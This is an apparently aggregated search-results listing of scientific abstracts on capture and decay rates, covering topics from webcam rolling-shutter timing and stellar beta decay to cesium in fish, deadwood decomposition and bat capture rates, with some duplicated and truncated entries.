the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 1. Wobbly Strings: Calculating the Capture Rate of a Webcam Using the Rolling Shutter Effect in a Guitar ERIC Educational Resources Information Center Cunnah, David 2014-01-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar. The exercise links the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 2. Wobbly Strings: Calculating the Capture Rate of a Webcam Using the Rolling Shutter Effect in a Guitar ERIC Educational Resources Information Center Cunnah, David 2014-01-01 In this paper I propose a method of calculating the time between line captures in a standard complementary metal-oxide-semiconductor (CMOS) webcam using the rolling shutter effect when filming a guitar. The exercise links the concepts of wavelength and frequency, while outlining the basic operation of a CMOS camera through vertical line capture. 3. Intravoxel distribution of DWI decay rates reveals C6 glioma invasion in rat brain. PubMed Bennett, Kevin M; Hyde, James S; Rand, Scott D; Bennett, Raoqiong; Krouwer, Hendrikus G J; Rebro, Kelly J; Schmainda, Kathleen M 2004-11-01 The hypothesis was tested that the intravoxel distribution of water diffusion rates, as measured with a stretched-exponential model of diffusion-weighted imaging (DWI), is a marker of brain tumor invasion. Eight rats underwent intracerebral inoculation of C6 glioma cells. In three rats, cells were labeled with a fluorescent dye for microscopy. One rat was inoculated with a saline solution, and five more rats were imaged without inoculation as controls. Five healthy uninoculated rats were also imaged. DWI was performed 14-15 days after inoculation, with diffusion-weighting factor b = 500 to 6500 sec/mm2, and the resulting signal attenuation was fitted with the stretched-exponential model. The heterogeneity index values were significantly lower (P < 0.05) in the peritumor ROI than in normal gray matter and significantly higher than in normal white matter. The distributed diffusion coefficient values were significantly lower than in normal white matter or normal gray matter. Fluorescence microscopy confirmed the presence of tumors in the peritumor region that could be histologically distinguished from the main tumor mass. There was no change in proton density or T2-weighted images in the peritumor region, making vasogenic edema unlikely as a source of contrast. It is therefore thought that the heterogeneity parameter alpha is a marker of brain tumor invasion. (c) 2004 Wiley-Liss, Inc. 4. Collision rates for rare cell capture in periodic obstacle arrays strongly depend on density of cell suspension. PubMed Cimrák, I 2016-11-01 Recently, computational modelling has been successfully used for determination of collision rates for rare cell capture in periodic obstacle arrays. The models were based on particle advection simulations where the cells were advected according to velocity field computed from two dimensional Navier-Stokes equations. This approach may be used under the assumption of very dilute cell suspensions where no mutual cell collisions occur. We use the object-in-fluid framework to demonstrate that even with low cell-to-fluid ratio, the optimal geometry of the obstacle array significantly changes. We show computational simulations for ratios of 3.5, 6.9 and 10.4% determining the optimal geometry of the periodic obstacle arrays. It was already previously demonstrated that cells in periodic obstacle arrays follow trajectories in two modes: the colliding mode and the zig-zag mode. The colliding mode maximizes the cell-obstacle collision frequency. Our simulations reveal that for dilute suspensions and for suspensions with cell-to-fluid ratio 3.5%, there is a range of column shifts for which the cells follow colliding trajectories. However we showed, that for 6.9 and 10.4%, the cells never follow colliding trajectories. 5. An alternative marker for the effectiveness of water fluoridation: hospital extraction rates for dental decay, a two-region study. PubMed Elmer, T B; Langford, J W; Morris, A J 2014-03-01 Contemporary evidence for the effectiveness of water fluoridation schemes in the U.K. is sparse. The utility of routinely collected data in providing evidence warrants further research. To examine inpatient hospital episodes statistics for dental extractions as an alternative population marker for the effectiveness of water fluoridation by comparing hospital admissions between two major strategic health authority (SHA) areas, the West Midlands SHA-largely fluoridated--and the North West SHA--largely unfluoridated. Hospital episodes statistics (HES) were interrogated to provide data on admissions for simple and surgical dental extractions, which had a primary diagnostic code of either dental caries or diseases of pulp and periapical tissues for financial years 2006/7, 2007/8 and 2008/9. Data was aggregated by SHA area and quinary age group. Directly standardised rates (DSR) of admissions purchased for each primary care trust (PCT) were calculated and ranked by index of multiple deprivation (IMD). A significant difference in DSRs of admission between PCTs in the West Midlands and North West was observed (Mann-Whitney U test [p <0.0001]) irrespective of IMD ranking. The difference in rates between the two most deprived PCTs was 27-fold. After ranking by IMD, DSRs of hospital admissions for the extraction of decayed or pulpally/periapically involved teeth is lower in areas with a fluoridated water supply. The analysis of routinely collected HES data may help identify the impact of water fluoridation schemes. 6. β -decay rate of 59Fe in shell burning environment and its influence on the production of 60Fe in a massive star Li, K. A.; Lam, Y. H.; Qi, C.; Tang, X. D.; Zhang, N. T. 2016-12-01 We deduced the stellar β -decay rate of 59Fe at typical carbon-shell burning temperature by taking the experimental Gamow-Teller transition strengths of the 59Fe excited states. The result is also compared with those derived from large-scale shell model calculations. The new rate is up to a factor of 2.5 lower than the theoretical rate of Fuller, Fowler, and Newman (FFN) and up to a factor of 5 higher than decay rate of Langanke and Martínez-Pinedo (LMP) in the temperature region 0.5 ≤T ≤2 GK. We estimated the impact of the newly determined rate on the synthesis of cosmic γ emitter 60Fe in C-shell burning and explosive C/Ne burning using a one-zone model calculation. Our results show that 59Fe stellar β decay plays an important role in 60Fe nucleosynthesis, even though the uncertainty of the decay rate is rather large due to the error of B (GT) strengths. 7. Trophic position and metabolic rate predict the long-term decay process of radioactive cesium in fish: a meta-analysis. PubMed Doi, Hideyuki; Takahara, Teruhiko; Tanaka, Kazuya 2012-01-01 Understanding the long-term behavior of radionuclides in organisms is important for estimating possible associated risks to human beings and ecosystems. As radioactive cesium (¹³⁷Cs) can be accumulated in organisms and has a long physical half-life, it is very important to understand its long-term decay in organisms; however, the underlying mechanisms determining the decay process are little known. We performed a meta-analysis to collect published data on the long-term ¹³⁷Cs decay process in fish species to estimate biological (metabolic rate) and ecological (trophic position, habitat, and diet type) influences on this process. From the linear mixed models, we found that 1) trophic position could predict the day of maximum ¹³⁷Cs activity concentration in fish; and 2) the metabolic rate of the fish species and environmental water temperature could predict ecological half-lives and decay rates for fish species. These findings revealed that ecological and biological traits are important to predict the long-term decay process of ¹³⁷Cs activity concentration in fish. 8. Trophic Position and Metabolic Rate Predict the Long-Term Decay Process of Radioactive Cesium in Fish: A Meta-Analysis PubMed Central Doi, Hideyuki; Takahara, Teruhiko; Tanaka, Kazuya 2012-01-01 Understanding the long-term behavior of radionuclides in organisms is important for estimating possible associated risks to human beings and ecosystems. As radioactive cesium (137Cs) can be accumulated in organisms and has a long physical half-life, it is very important to understand its long-term decay in organisms; however, the underlying mechanisms determining the decay process are little known. We performed a meta-analysis to collect published data on the long-term 137Cs decay process in fish species to estimate biological (metabolic rate) and ecological (trophic position, habitat, and diet type) influences on this process. From the linear mixed models, we found that 1) trophic position could predict the day of maximum 137Cs activity concentration in fish; and 2) the metabolic rate of the fish species and environmental water temperature could predict ecological half-lives and decay rates for fish species. These findings revealed that ecological and biological traits are important to predict the long-term decay process of 137Cs activity concentration in fish. PMID:22279534 9. Time since death and decay rate constants of Norway spruce and European larch deadwood in subalpine forests determined using dendrochronology and radiocarbon dating Petrillo, Marta; Cherubini, Paolo; Fravolini, Giulia; Marchetti, Marco; Ascher-Jenull, Judith; Schärer, Michael; Synal, Hans-Arno; Bertoldi, Daniela; Camin, Federica; Larcher, Roberto; Egli, Markus 2016-03-01 Due to the large size (e.g. sections of tree trunks) and highly heterogeneous spatial distribution of deadwood, the timescales involved in the coarse woody debris (CWD) decay of Picea abies (L.) Karst. and Larix decidua Mill. in Alpine forests are largely unknown. We investigated the CWD decay dynamics in an Alpine valley in Italy using the chronosequence approach and the five-decay class system that is based on a macromorphological assessment. For the decay classes 1-3, most of the dendrochronological samples were cross-dated to assess the time that had elapsed since tree death, but for decay classes 4 and 5 (poorly preserved tree rings) radiocarbon dating was used. In addition, density, cellulose, and lignin data were measured for the dated CWD. The decay rate constants for spruce and larch were estimated on the basis of the density loss using a single negative exponential model, a regression approach, and the stage-based matrix model. In the decay classes 1-3, the ages of the CWD were similar and varied between 1 and 54 years for spruce and 3 and 40 years for larch, with no significant differences between the classes; classes 1-3 are therefore not indicative of deadwood age. This seems to be due to a time lag between the death of a standing tree and its contact with the soil. We found distinct tree-species-specific differences in decay classes 4 and 5, with larch CWD reaching an average age of 210 years in class 5 and spruce only 77 years. The mean CWD rate constants were estimated to be in the range 0.018 to 0.022 y-1 for spruce and to about 0.012 y-1 for larch. Snapshot sampling (chronosequences) may overestimate the age and mean residence time of CWD. No sampling bias was, however, detectable using the stage-based matrix model. Cellulose and lignin time trends could be derived on the basis of the ages of the CWD. The half-lives for cellulose were 21 years for spruce and 50 years for larch. The half-life of lignin is considerably higher and may be more than 10. β-DECAY of Key Titanium Isotopes in Stellar Environment Amongst iron regime nuclei, β-decay rates on titanium isotopes are considered to be important during the late phases of evolution of massive stars. The key β-decay isotopes during presupernova evolution were searched from available literature and a microscopic calculation of the decay rates were performed using the proton-neutron quasiparticle random phase approximation (pn-QRPA) theory. As per earlier simulation results, electron capture and β-decay on certain isotopes of titanium are considered to be important for the presupernova evolution of massive stars. Earlier the stellar electron capture rates and neutrino energy loss rates due to relevant titanium isotopes were presented. In this paper we finally present the β-decay rates of key titanium isotopes in stellar environment. The results are also compared against previous calculations. The pn-QRPA β-decay rates are bigger at high stellar temperatures and smaller at high stellar densities compared to the large scale shell model results. This study can prove useful for the core-collapse simulators. 11. The in vivo efficacy of neuraminidase inhibitors cannot be determined from the decay rates of influenza viral titers observed in treated patients Palmer, John; Dobrovolny, Hana M.; Beauchemin, Catherine A. A. 2017-01-01 Antiviral therapy is a first line of defence against new influenza strains. Current pandemic preparations involve stock- piling oseltamivir, an oral neuraminidase inhibitor (NAI), so rapidly determining the effectiveness of NAIs against new viral strains is vital for deciding how to use the stockpile. Previous studies have shown that it is possible to extract the drug efficacy of antivirals from the viral decay rate of chronic infections. In the present work, we use a nonlinear mathematical model representing the course of an influenza infection to explore the possibility of extracting NAI drug efficacy using only the observed viral titer decay rates seen in patients. We first show that the effect of a time-varying antiviral concentration can be accurately approximated by a constant efficacy. We derive a relationship relating the true treatment dose and time elapsed between doses to the constant drug dose required to approximate the time- varying dose. Unfortunately, even with the simplification of a constant drug efficacy, we show that the viral decay rate depends not just on drug efficacy, but also on several viral infection parameters, such as infection and production rate, so that it is not possible to extract drug efficacy from viral decay rate alone. 12. The in vivo efficacy of neuraminidase inhibitors cannot be determined from the decay rates of influenza viral titers observed in treated patients PubMed Central Palmer, John; Dobrovolny, Hana M.; Beauchemin, Catherine A. A. 2017-01-01 Antiviral therapy is a first line of defence against new influenza strains. Current pandemic preparations involve stock- piling oseltamivir, an oral neuraminidase inhibitor (NAI), so rapidly determining the effectiveness of NAIs against new viral strains is vital for deciding how to use the stockpile. Previous studies have shown that it is possible to extract the drug efficacy of antivirals from the viral decay rate of chronic infections. In the present work, we use a nonlinear mathematical model representing the course of an influenza infection to explore the possibility of extracting NAI drug efficacy using only the observed viral titer decay rates seen in patients. We first show that the effect of a time-varying antiviral concentration can be accurately approximated by a constant efficacy. We derive a relationship relating the true treatment dose and time elapsed between doses to the constant drug dose required to approximate the time- varying dose. Unfortunately, even with the simplification of a constant drug efficacy, we show that the viral decay rate depends not just on drug efficacy, but also on several viral infection parameters, such as infection and production rate, so that it is not possible to extract drug efficacy from viral decay rate alone. PMID:28067324 13. THE LONG-TERM DECAY IN PRODUCTION RATES FOLLOWING THE EXTREME OUTBURST OF COMET 17P/HOLMES SciTech Connect Schleicher, David G. 2009-10-15 Numerous sets of narrowband filter photometry were obtained of Comet 17P/Holmes from Lowell Observatory during the interval of 2007 November 1 to 2008 March 5. Observations began 8 days following its extreme outburst, at which time the derived water production rate, based on OH measurements, was 5 x 10{sup 29} molecule s{sup -1} and the derived proxy of dust production, A({theta})f{rho}, was about 5 x 10{sup 5} cm. Relative production rates for the other gas species, CN, C{sub 2}, C{sub 3}, and NH, are consistent with 'typical' composition (based on our update to the classifications by A'Hearn et al.). An exponential decay in the logarithm of measured production rates as a function of time was observed for all species, with each species dropping by factors of about 200-500 after 125 days. All gas species exhibited clear trends with aperture size, and these trends are consistent with larger apertures having a greater proportion of older material that was released when production rates were higher. Much larger aperture trends were measured for the dust, most likely because the dust grains have smaller outflow velocities and longer lifetimes than the gas species; therefore, a greater proportion of older, i.e., higher production dust is contained within a given aperture. By extrapolating to a sufficiently small aperture size, we derive near-instantaneous water and dust production rates throughout the interval of observation, and also estimate values immediately following the outburst. The finite lifetime of the gas species requires that much higher ice vaporization rates were taking place throughout the observation interval than occurred prior to the outburst, likely due to the continued release of icy grains from the nucleus. The relatively small aperture trends for the gas species also imply that the bulk of fresh, excess volatiles are confined to the nucleus and near-nucleus regime, rather than being associated with the outburst ejecta cloud. A minimum of about 0 14. Vibrational structure and partial rates of resonant Auger decay ofthe N 1s ->2pi core excitations in nitric oxide SciTech Connect Kukk, Edwin; Snell, Gyorgy; Bozek, John D.; Cheng, Wei-T.; Berrah, N. 2000-07-06 High-resolution resonant Auger electron spectra of NO measured in the vicinity of the N 1s {yields} 2{pi} core excitations are presented. The open shell electronic configuration of the molecule results in four excited electronic states, three of which are populated in the photoabsorption spectrum, {sup 2}{Delta}, {sup 2}{Sigma}{sup -} and {sup 2}{Sigma}{sup +}. Electron emission spectra obtained at different vibrational levels of the three N 1s core-excited states of NO are reported. Recently reported ab initio calculations [J. Chem. Phys. 106, 4038(1997)] are used to generate theoretical spectra for comparison with the experimental results taking lifetime vibration interference and Auger resonant Raman effects into account. Very good agreement is found for the lowest energy X {sup 1}{Sigma}{sup +} final ionic state. Spectra of the higher energy final ionic states are decomposed into contributions from the different 5{sigma}{sup -1}2{pi}{sup 1} and 1{pi}{sup -1}2{pi}{sup 1} configurations for comparison of the calculated and experimental partial Auger decay rates. A revised value for the adiabatic ionization energy of the {sup 1}{Delta} ionic state results from the deconvolution. 15. Global Well-Posedness and Decay Rates of Strong Solutions to a Non-Conservative Compressible Two-Fluid Model Evje, Steinar; Wang, Wenjun; Wen, Huanyao 2016-09-01 In this paper, we consider a compressible two-fluid model with constant viscosity coefficients and unequal pressure functions {P^+neq P^-}. As mentioned in the seminal work by Bresch, Desjardins, et al. (Arch Rational Mech Anal 196:599-629, 2010) for the compressible two-fluid model, where {P^+=P^-} (common pressure) is used and capillarity effects are accounted for in terms of a third-order derivative of density, the case of constant viscosity coefficients cannot be handled in their settings. Besides, their analysis relies on a special choice for the density-dependent viscosity [refer also to another reference (Commun Math Phys 309:737-755, 2012) by Bresch, Huang and Li for a study of the same model in one dimension but without capillarity effects]. In this work, we obtain the global solution and its optimal decay rate (in time) with constant viscosity coefficients and some smallness assumptions. In particular, capillary pressure is taken into account in the sense that {Δ P=P^+ - P^-=fneq 0} where the difference function {f} is assumed to be a strictly decreasing function near the equilibrium relative to the fluid corresponding to {P^-}. This assumption plays an key role in the analysis and appears to have an essential stabilization effect on the model in question. 16. Probability of passing through a parabolic barrier and thermal decay rate: Case of linear coupling both in momentum and in coordinate SciTech Connect Kuzyakin, R. A.; Sargsyan, V. V.; Adamian, G. G.; Antonenko, N. V. 2011-09-15 With the quantum diffusion approach, the probability of passing through the parabolic barrier and the quasistationary thermal decay rate from a metastable state are examined in the limit of linear coupling both in momentum and in coordinate between a collective subsystem and the environment. An increase of passing probability with friction coefficient is demonstrated to occur at subbarrier energies. 17. Baseline capture rates and roosting habits of Myotis septentrionalis (Northern Long-Eared Bat) prior to white-nose syndrome  detection in the southern Appalachians Treesearch Vanessa G. Rojas; Joy M. O' Keefe; Susan C. Loeb 2017-01-01 Myotis septentrionalis (Northern Long-eared Bat) is a federally threatened insectivorous bat facing devastating population declines due to white-nose syndrome (WNS). Our study provides pre-WNS (2009) capture rates and roosting-behavior data for Northern Long-eared Bats in the southern Appalachians. We conducted mist-net surveys at 37 sites and... 18. HOLMES: The electron capture decay of [Formula: see text]Ho to measure the electron neutrino mass with sub-eV sensitivity. PubMed Alpert, B; Balata, M; Bennett, D; Biasotti, M; Boragno, C; Brofferio, C; Ceriale, V; Corsini, D; Day, P K; De Gerone, M; Dressler, R; Faverzani, M; Ferri, E; Fowler, J; Gatti, F; Giachero, A; Hays-Wehle, J; Heinitz, S; Hilton, G; Köster, U; Lusignoli, M; Maino, M; Mates, J; Nisi, S; Nizzolo, R; Nucciotti, A; Pessina, G; Pizzigoni, G; Puiu, A; Ragazzi, S; Reintsema, C; Gomes, M Ribeiro; Schmidt, D; Schumann, D; Sisti, M; Swetz, D; Terranova, F; Ullom, J The European Research Council has recently funded HOLMES, a new experiment to directly measure the neutrino mass. HOLMES will perform a calorimetric measurement of the energy released in the decay of [Formula: see text]Ho. The calorimetric measurement eliminates systematic uncertainties arising from the use of external beta sources, as in experiments with beta spectrometers. This measurement was proposed in 1982 by A. De Rujula and M. Lusignoli, but only recently the detector technological progress allowed to design a sensitive experiment. HOLMES will deploy a large array of low temperature microcalorimeters with implanted [Formula: see text]Ho nuclei. The resulting mass sensitivity will be as low as 0.4 eV. HOLMES will be an important step forward in the direct neutrino mass measurement with a calorimetric approach as an alternative to spectrometry. It will also establish the potential of this approach to extend the sensitivity down to 0.1 eV. We outline here the project with its technical challenges and perspectives. 19. The influence of hook type, angler experience, and fish size on injury rates and the duration of capture in an Alaskan catch-and-release rainbow trout fishery USGS Publications Warehouse Meka, Julie M. 2004-01-01 Owing to concerns about the high incidence of past hooking injuries in Alagnak River rainbow trout Oncorhynchus mykiss, fish were captured with spin- and fly-fishing gear with barbed and barbless circle and "J" hooks to determine gear types contributing to injury. Landing and hook removal times were measured for a portion of fish captured, and the anatomical hooking location, hooking scar locations, bleeding intensity, angler experience, and fish size were recorded for all captured fish. Approximately 62% of fish captured experienced at least one new hooking injury, and 29% of fish had at least one past hooking injury. Small fish sustained higher new injury and bleeding rates, but large fish had higher past injury rates. Injury rates were higher for barbed J hooks, barbed J hooks took longer to remove, and fish caught by spin-fishing were injured more frequently than fish caught by fly-fishing. Fewer fly-fishing-caught fish were injured using circle hooks, and circle hooks tended to hook fish in only one location, generally in the jaw. Barbed J hooks were more efficient at landing fish, and J hooks were more efficient at landing fish than circle hooks. Novice anglers injured proportionally more fish than experienced anglers, primarily during hook removal. Landing time was positively correlated with fish size, and experienced anglers took longer to land fish than novices because they captured larger fish. These results suggest that a reduction in hooking injuries may be achieved by using circle hooks as an alternative to J hooks and barbless J hooks to reduce injury and handling time, yet catch efficiency for both methods would be reduced. Although fish captured with barbless J hooks and circle hooks had fewer injuries, it is important to note that each hook type also caused significant injury, and angler education is recommended to promote proper hook removal techniques. 20. Gamow-Teller transitions from Mg24 and their impact on the electron capture rates in the O+Ne+Mg cores of stars Nabi, Jameel-Un; Rahman, Muneeb-Ur 2007-03-01 Electron captures on nuclei play an important role in the collapse of stellar core in the stages leading to a type-II supernova. Recent observations of subluminous Type II-P supernovae (e.g., 2005cs, 2003gd, 1999br) were able to rekindle the interest in 8 10 M⊙ which develop O+Ne+Mg cores. We used the proton-neutron quasiparticle random phase approximation (pn-QRPA) theory to calculate the B(GT) strength for Mg24 →Na24 and its associated electron capture rates for incorporation in simulation calculations. The calculated rates, in this article, have differences with the earlier reported shell model and Fuller, Fowler, and Newman (hereafter FN2) rates. We compared Gamow-Teller (GT) strength distribution functions and found fairly good agreement with experiment and shell model. However, the GT centroid and the total GT strength, which are useful in the calculation of electron capture rates in the core of massive presupernova stars, lead to the enhancement of our rate up to a factor of 4 compared to the shell model rates at high temperatures and densities. 1. Suspended particle capture by synthetic vegetation in a laboratory flume Fauria, Kristen E.; Kerwin, Rachel E.; Nover, Daniel; Schladow, S. Geoffrey 2015-11-01 Vegetated floodplains and wetlands trap particles, a process that is important for water quality and wetland function and morphology. The rates of particle removal by vegetation remain poorly characterized, especially for small particles and vegetation coated with biofilm. In this study, we measured capture rates of road dust by arrays of grass-like synthetic vegetation in a laboratory flume. We performed 40 experiments in which stem density, flow velocity, the presence of biofilm, and initial particle concentration varied, and used an in situ particle size analyzer to measure the concentration of a continuous particle size distribution (1.25-250 µm diameter). We fit first-order decay models to the particle concentration measurements to determine particle capture rates and found that capture rates increased with particle size, stem density, and the presence of biofilm. Capture rates decreased with increasing flow velocity, which suggests that fast flows may resuspend particles from stems. We also calculated percent particle capture efficiencies and fit a new empirical model for capture efficiency to our results. We found that particle capture efficiency was highest for low stem density treatments and propose that stem density affects capture by altering turbulent kinetic energy. 2. Changes in rates of capture and demographics of Myotis septentrionalis (Northern Long-eared Bat) in Western Virginia before and after onset of white-nose syndrome USGS Publications Warehouse Reynolds, Richard J.; Powers, Karen E.; Orndorff, Wil; Ford, W. Mark; Hobson, Christopher S. 2016-01-01 Documenting the impacts of white-nose syndrome (WNS) on demographic patterns, such as annual survivorship and recruitment, is important to understanding the extirpation or possible stabilization and recovery of species over time. To document demographic impacts of WNS on Myotis septentrionalis (Northern Long-eared Bat), we mistnetted at sites in western Virginia where Northern Long-eared Bats were captured in summer before (1990–2009) and after (2011–2013) the onset of WNS. Our mean capture rates per hour, adjusted for area of net and sampling duration, declined significantly from 0.102 bats/ m2/h before WNS to 0.005 bats/m2/h (-95.1%) by 2013. We noted a time lag in the rate of decline between published data based on bats captured during the swarming season and our summer mist-netting captures from the same geographic area. Although proportions of pregnant or lactating females did not vary statistically in samples obtained before and after the onset of WNS, the proportion of juvenile bats declined significantly (-76.7%), indicating that the viability of Northern Long-eared Bats in western Virginia is tenuous. 3. Large beta-delayed one-neutron and two-neutron emission rates in the decay of 86Ga SciTech Connect Batchelder, J. C.; Gross, Carl J.; Grzywacz, Robert Kazimierz; Miernik, Krzysztof A.; Anthony J. Mendez, II; Mazzocchi, C.; Madurga, M.; Liu, Yuan; Paulauskas, Stanley V.; Miller, D.; Rykaczewski, Krzysztof Piotr; Winger, J. A.; Wolinska-Cichocka, M; Brewer, N. T.; Borzov, Ivan N.; Jost, Carola U. 2013-09-24 Beta decay of Ga86 was studied by means of β-neutron-γ spectroscopy. An isotopically pure 86Ga beam was produced at the Holifield Radioactive Ion Beam Facility using a resonance ionization laser ion source and high-resolution electromagnetic separation. The decay of 86Ga revealed a half-life of 43+21-15 ms and large β-delayed one-neutron and two-neutron branching ratios of P1n=60(10)% and P2n=20(10)%. The βγ decay of 86Ga populated a 527 keV transition that is interpreted as the deexcitation of the first 2+ state in the N=54 isotone Ge86 and suggests a quick onset of deformation in Ge isotopes beyond N=50. 4. High-Resolution Neutron Capture and Total Cross-Section Measurements, and the Astrophysical 95Mo(n,gamma) Reaction Rate at s-process Temperatures SciTech Connect Koehler, Paul Edward; Guber, Klaus H; Harvey, John A; Wiarda, Dorothea 2008-01-01 Abundances of Mo isotopes predicted by stellar models of the s process are, except for {sup 95}Mo, in good agreement with data from single grains of mainstream presolar SiC. Because the meteorite data seemed sound and no reasonable modification to stellar theory resulted in good agreement for {sup 95}Mo, it has been suggested that the recommended neutron capture reaction rate for this nuclide is 30% too low. Therefore, we have made a new determination of the {sup 95}Mo(n,{gamma}) reaction rate via high-resolution measurements of the neutron-capture and total cross sections of {sup 95}Mo at the Oak Ridge Electron Linear Accelerator. These data were analyzed with the R-matrix code SAMMY to obtain parameters for resonances up to E{sub n} = 10 keV. Also, a small change to our capture apparatus allowed us to employ a new technique to vastly improve resonance spin and parity assignments. These new resonance parameters, together with our data in the unresolved range, were used to calculate the {sup 95}Mo(n,{gamma}) reaction rate at s-process temperatures. We compare the currently recommended rate to our new results and discuss their astrophysical impact. 5. Combinedatomic–nuclear decay SciTech Connect Dzyublik, A. Ya. 2016-05-15 We analyzed in details the combined decay of the atomic-nuclear state, which consists of the excited 3/2{sup +} level of {sub 63}{sup 153}Eu and K hole, formed in the K capture by {sup 153}Gd. This decay proceeds in two stages. First, the nucleus transfers its energy to 2p electron, which flies into the continuum spectrum, and then returns into 1s hole, emitting γ quantum with the energy equal to the sum of energies of the nuclear and atomic transitions. We estimated the decay probability to be 2.2 × 10{sup −13}, that is much less than the recent experimental findings. 6. Analysis of D0 -> K+ pi- pi0 Decays: Search for D0-D0bar Mixing, and Measurements of the Doubly Cabibbo-Suppressed Decay Rate and Resonance Contributions SciTech Connect Wilson, Michael Galante 2005-12-13 Analyzing D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0} decays, herein are presented the methods and results of a search for D{sup 0}-{bar D}{sup 0} mixing, a measurement of the branching ratio R {equivalent_to} {Lambda}(D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0})/{Lambda}(D{sup 0} {yields} K{sup -}{pi}{sup +}{pi}{sup 0}), and measurements of the contributions from D{sup 0} {yields} K{sup +}{rho}{sup -}, K*{sup +}{pi}{sup -}, K*{sup 0}{pi}{sup 0}; 230.4 fb{sup -1} of data collected from the BABAR detector at the PEP-II collider during 2000-2004 (Runs 1-4) are analyzed. An event-level tagging technique is developed, which facilitates the accurate determination of doubly Cabibbo-suppressed resonance contributions by suppressing background from Cabibbo-favored decays. The branching ratio is measured as R = (0.214 {+-} 0.008 (stat) {+-} 0.008 (syst))%, with (46.1 {+-} 3.3 (stat) {+-} 2.9 (syst))% of D{sup 0} {yields} K{sup +}{pi}{sup -}{pi}{sup 0} decays proceeding through the channel D{sup 0} {yields} K*{sup +}{pi}{sup -}. The data are consistent with the null-D-mixing hypothesis at a confidence level of 10%, and the expected value of {+-} {radical}(x{sup 2} + y{sup 2}) is measured as -0.013 {+-} 0.010 (stat), indicating negative interference between mixing and doubly Cabibbo-suppressed decay. The expected value of the integrated mixing rate is (x{sup 2} + y{sup 2})/2 = (0.013 {+-} 0.013 (stat))%. 7. Measurements of radiative-decay rates of the 2s22p(2P°)-2s2p2(4P) intersystem transitions of C+ Fang, Z.; Kwong, Victor H. S.; Wang, Jiebing; Parkinson, W. H. 1993-08-01 The radiative-decay rates of the 2s22p(2P0)-2s2p2(4P) intersystem transitions of C+ ions have been measured by recording the time dependence of the ~233-nm emission. A cylindrical radio-frequency ion trap was used to store electron-impact-produced C+ ions. The time-dependent signals were analyzed by multiexponential least-squares fits to the data. The measured radiative-decay rates to the ground term are 146.4(+8.3,-9.2) s-1 for 4P1/2, 11.6(+0.8,-1.7) s-1 for 4P3/2, and 51.2(+2.6,-3.5) s-1 for 4P5/2. Comparison of the measured values with theoretical values is presented. 8. Estimation of decay rates for fecal indicator bacteria and bacterial pathogens in agricultural field-applied manure EPA Science Inventory Field-applied manure is an important source of pathogenic exposure in surface water bodies for humans and ecological receptors. We analyzed the persistence and decay of fecal indicator bacteria and bacterial pathogens from three sources (cattle, poultry, swine) for agricultural f... 9. Estimation of decay rates for fecal indicator bacteria and bacterial pathogens in agricultural field-applied manure EPA Science Inventory Field-applied manure is an important source of pathogenic exposure in surface water bodies for humans and ecological receptors. We analyzed the persistence and decay of fecal indicator bacteria and bacterial pathogens from three sources (cattle, poultry, swine) for agricultural f... 10. Reshaping the epigenetic landscape during early flower development: induction of attractor transitions by relative differences in gene decay rates. PubMed Davila-Velderrain, Jose; Villarreal, Carlos; Alvarez-Buylla, Elena R 2015-05-13 Gene regulatory network (GRN) dynamical models are standard systems biology tools for the mechanistic understanding of developmental processes and are enabling the formalization of the epigenetic landscape (EL) model. In this work we propose a modeling framework which integrates standard mathematical analyses to extend the simple GRN Boolean model in order to address questions regarding the impact of gene specific perturbations in cell-fate decisions during development. We systematically tested the propensity of individual genes to produce qualitative changes to the EL induced by modification of gene characteristic decay rates reflecting the temporal dynamics of differentiation stimuli. By applying this approach to the flower specification GRN (FOS-GRN) we uncovered differences in the functional (dynamical) role of their genes. The observed dynamical behavior correlates with biological observables. We found a relationship between the propensity of undergoing attractor transitions between attraction basins in the EL and the direction of differentiation during early flower development - being less likely to induce up-stream attractor transitions as the course of development progresses. Our model also uncovered a potential mechanism at play during the transition from EL basins defining inflorescence meristem to those associated to flower organs meristem. Additionally, our analysis provided a mechanistic interpretation of the homeotic property of the ABC genes, being more likely to produce both an induced inter-attractor transition and to specify a novel attractor. Finally, we found that there is a close relationship between a gene's topological features and its propensity to produce attractor transitions. The study of how the state-space associated with a dynamical model of a GRN can be restructured by modulation of genes' characteristic expression times is an important aid for understanding underlying mechanisms occurring during development. Our contribution offers a 11. A unified approach via convexity for optimal energy decay rates of finite and infinite dimensional vibrating damped systems with applications to semi-discretized vibrating damped systems Alabau-Boussouira, Fatiha The Liapunov method is celebrated for its strength to establish strong decay of solutions of damped equations. Extensions to infinite dimensional settings have been studied by several authors (see e.g. Haraux, 1991 [11], and Komornik and Zuazua, 1990 [17] and references therein). Results on optimal energy decay rates under general conditions of the feedback is far from being complete. The purpose of this paper is to show that general dissipative vibrating systems have structural properties due to dissipation. We present a general approach based on convexity arguments to establish sharp optimal or quasi-optimal upper energy decay rates for these systems, and on comparison principles based on the dissipation property, and interpolation inequalities (in the infinite dimensional case) for lower bounds of the energy. We stress the fact that this method works for finite as well as infinite dimensional vibrating systems and as well as for applications to semi-discretized nonlinear damped vibrating PDE's. A part of this approach has been introduced in Alabau-Boussouira (2004, 2005) [1,2]. In the present paper, we identify a new, simple and explicit criteria to select a class of nonlinear feedbacks, for which we prove a simplified explicit energy decay formula comparatively to the more general but also more complex formula we give in Alabau-Boussouira (2004, 2005) [1,2]. Moreover, we prove optimality of the decay rates for this class, in the finite dimensional case. This class includes a wide range of feedbacks, ranging from very weak nonlinear dissipation (exponentially decaying in a neighborhood of zero), to polynomial, or polynomial-logarithmic decaying feedbacks at the origin. In the infinite dimensional case, we establish a comparison principle on the energy of sufficiently smooth solutions through the dissipation relation. This principle relies on suitable interpolation inequalities. It allows us to give lower bounds for the energy of smooth initial data for the one 12. Transition in the decay rates of stationary distributions of Lévy motion in an energy landscape. PubMed Kaleta, Kamil; Lőrinczi, József 2016-02-01 The time evolution of random variables with Lévy statistics has the ability to develop jumps, displaying very different behaviors from continuously fluctuating cases. Such patterns appear in an ever broadening range of examples including random lasers, non-Gaussian kinetics, or foraging strategies. The penalizing or reinforcing effect of the environment, however, has been little explored so far. We report a new phenomenon which manifests as a qualitative transition in the spatial decay behavior of the stationary measure of a jump process under an external potential, occurring on a combined change in the characteristics of the process and the lowest eigenvalue resulting from the effect of the potential. This also provides insight into the 